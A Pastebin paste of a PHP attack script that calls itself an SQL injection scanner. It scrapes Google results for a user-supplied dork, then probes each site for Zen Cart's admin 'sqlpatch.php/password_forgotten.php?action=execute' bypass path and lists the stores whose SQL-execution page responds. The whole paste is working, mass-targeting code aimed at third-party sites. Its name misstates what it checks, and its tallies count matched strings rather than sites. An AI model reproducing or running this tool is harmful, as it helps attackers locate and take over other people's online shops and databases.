Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /**
- * SQL Injection Scanner
- * PHP Version By XShimeX
- * Version 1.0
- * Thanks To: TBDSecurity.Com, <b style="color:black;background-color:#ffff66">HMSecurity</b>.org, All my friends, And ALLAH.
- */
- set_time_limit(0);
- $vuln = 0;
- $not_vuln = 0;
- $total = 0;
- print "[+] SQL Injection Scanner PHP Version\n";
- print "[+] Version 1.0 By XShimeX\n";
- if(!$argv[1]) {
- print "[%] Usage: $argv[0] <dork>\n";
- print "[%] Example : $argv[0] inurl:news.php?id=\n";
- exit;
- }
- /**
- * SQL Bug(syntax error) takes from here: http://www.darkc0de.com/others/devilzc0de.py
- */
- $bug = array(
- 'If you are installing 3rd-party contributions, note that you do so at your own risk',
- 'BE SURE TO DO A FULL DATABASE BACKUP BEFORE RUNNING SCRIPTS HERE',
- 'Zen Cart™ makes no warranty as to the safety of scripts supplied by 3rd-party contributors. Test before using on your live database',
- 'NOTE: Zen Cart database-upgrade scripts should NOT be run from this page',
- 'Please upload the new zc_install folder and run the upgrade from there instead for better reliability'
- );
- print "[@] Start Finding Links...\n";
- for($i = 0; $i <= 900; $i += 10) {
- $fp = @file_get_contents("http://www.google.com/search?q=$argv[1]&num=10&hl=en&as_qdr=all&start=$i&sa=N");
- @preg_match_all("/<h3 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", $fp, $links);
- $url[] = $links[2];
- }
- print "[@] Done Finding Links...\n";
- print "[@] Now searching for Vulnerable\n";
- foreach($url as $key) {
- foreach($key as $value) {
- $fp = @file_get_contents($value."/admin/sqlpatch.php/password_forgotten.php?action=execute");
- foreach($bug as $error) {
- if(@preg_match("/$error/", $fp)) {
- print "[#] zen cart error: $value'\n";
- $vuln++;
- } else {
- $not_vuln++;
- }
- $total++;
- }
- }
- }
- print "[@] Done Scanning\n";
- print "[%] Result\n";
- print "[-] Total Vulnerable: $vuln\n";
- print "[-] Total Not Vulnerable : $not_vuln\n";
- print "[-] Total scanned Website: $total\n";
- print "Enjoy :)\n";
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement